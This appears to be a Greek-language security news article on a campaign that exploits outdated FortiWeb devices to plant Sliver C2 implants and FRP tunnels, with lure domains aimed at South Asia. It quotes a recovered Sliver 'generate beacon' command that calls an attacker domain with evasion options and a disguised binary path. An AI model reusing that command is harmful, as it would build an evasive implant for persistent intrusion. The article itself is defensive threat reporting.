Πρόσφατα ευρήματα υποδεικνύουν ότι ένας εξελιγμένος παράγοντας απειλών εκμεταλλεύεται ενεργά πολλές απαρχαιωμένες συσκευές FortiWeb για να αναπτύξει το πλαίσιο Sliver Command and Control (C2).
Αυτή η καμπάνια υπογραμμίζει μια ανησυχητική τάση όπου οι αντίπαλοι αξιοποιούν επιθετικά εργαλεία ανοιχτού κώδικα για να διατηρήσουν μόνιμη πρόσβαση σε παραβιασμένα δίκτυα, συχνά παρακάμπτοντας τις παραδοσιακές άμυνες ασφαλείας.
Οι εισβολείς φαίνεται να δίνουν προτεραιότητα στις μη επιδιορθωμένες συσκευές άκρων, μετατρέποντάς τις ουσιαστικά σε σταθερά σημεία εισόδου για ευρύτερη διείσδυση στο δίκτυο.
Η διαδικασία μόλυνσης περιλαμβάνει κυρίως την εκμετάλλευση ευπαθειών που αντιμετωπίζουν το κοινό σε συσκευές FortiWeb, στοχεύοντας συγκεκριμένα τις εκδόσεις υλικολογισμικού 5.4.202 έως 6.1.62.
Αν και η ακριβής ευπάθεια που χρησιμοποιήθηκε για τον συμβιβασμό του FortiWeb παραμένει ανεπιβεβαίωτη, η ομάδα έχει επίσης παρατηρήσει ότι αξιοποιεί το React2Shell (CVE-2025-55182) σε παράλληλες λειτουργίες.
Μόλις δημιουργηθεί η αρχική πρόσβαση, οι εισβολείς αναπτύσσουν το εργαλείο Fast Reverse Proxy (FRP) για να εκθέσουν τις τοπικές υπηρεσίες, δημιουργώντας μια άμεση γέφυρα μεταξύ του εσωτερικού δικτύου του θύματος και των εξωτερικών συστημάτων ελέγχου του εισβολέα.
.webp.jpeg "Ο Threat Actor εκμεταλλεύτηκε πολλαπλές συσκευές FortiWeb για να αναπτύξει το Sliver C2 για μόνιμη πρόσβαση")
Κατά τη διάρκεια του συνηθισμένου κυνηγιού απειλών ανοιχτού καταλόγου στο Censys, αναλυτές Ctrl-Alt-Int3l αναγνωρισθείς αυτή η κακόβουλη υποδομή μετά την ανακάλυψη εκτεθειμένων βάσεων δεδομένων και αρχείων καταγραφής Sliver C2.
Αυτά τα εκτεθειμένα περιουσιακά στοιχεία πρόσφεραν μια σπάνια ματιά στις επιχειρησιακές μεθόδους του εισβολέα, αποκαλύπτοντας ένα σύμπλεγμα παραβιασμένων συσκευών που προέρχονταν από κεντρικούς διακομιστές εντολών.
.webp.jpeg "Ο Threat Actor εκμεταλλεύτηκε πολλαπλές συσκευές FortiWeb για να αναπτύξει το Sliver C2 για μόνιμη πρόσβαση")
Η έρευνα επιβεβαίωσε ότι η πλειονότητα των οικοδεσποτών των θυμάτων εκτελούσε ξεπερασμένο υλικολογισμικό, γεγονός που τους καθιστούσε ιδιαίτερα ευάλωτους σε αυτήν την ευκαιριακή αλλά στοχευμένη καμπάνια.
Ο λειτουργικός αντίκτυπος είναι σοβαρός, καθώς παρέχει στον παράγοντα απειλής μακροπρόθεσμη επιμονή σε κρίσιμες συσκευές ασφαλείας που είναι συνήθως αξιόπιστες από το δίκτυο.
Ενσωματώνοντας το εμφύτευμα Sliver απευθείας στο τείχος προστασίας, οι εισβολείς μπορούν ενδεχομένως να παρακολουθούν την κυκλοφορία και να εκτελούν προνομιακές εντολές.
Η εκστρατεία δείχνει επίσης μια στρατηγική εστίαση, με συγκεκριμένους δείκτες που δείχνουν προς στόχους στη Νότια Ασία, που αποδεικνύεται από την προσεκτικά θεματική υποδομή δόλωμα.
Στρατηγική Διοίκησης και Ελέγχου
Η υποδομή του παράγοντα απειλής είναι χτισμένη γύρω από τομείς παραπλάνησης που έχουν σχεδιαστεί για να μιμούνται νόμιμες υπηρεσίες. Η ανάλυση της διαμόρφωσης C2 αποκάλυψε τομείς όπως ns1.ubunutpackages[.]store και ns1.bafairforce[.]army.
Αυτοί οι τομείς φιλοξενούσαν ψεύτικο περιεχόμενο, συμπεριλαμβανομένου ενός αποθετηρίου “Πακέτα Ubuntu” και μιας σελίδας στρατολόγησης “Bangladesh Airforce”, για να εξαπατήσουν τους υπερασπιστές του δικτύου.
Οι εισβολείς χρησιμοποίησαν συγκεκριμένες εντολές Sliver για να δημιουργήσουν τα ωφέλιμα φορτία τους με δυνατότητες διαφυγής. Η ακόλουθη εντολή ανακτήθηκε από τα αρχεία καταγραφής:
generate beacon --http ns1.ubunutpackages.store --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60
Αυτή η διαμόρφωση ρυθμίζει το beacon να επανασυνδέεται κάθε 120 δευτερόλεπτα και χρησιμοποιεί ένα πρότυπο “ubuntu” για να συνδυάζεται με διαδικασίες Linux.
Το δυαδικό αρχείο που προέκυψε αναπτύχθηκε στο /bin/.root/system-updater στις παραβιασμένες συσκευές FortiWeb, που μεταμφιέζονται περαιτέρω ως βοηθητικό πρόγραμμα ενημέρωσης συστήματος.
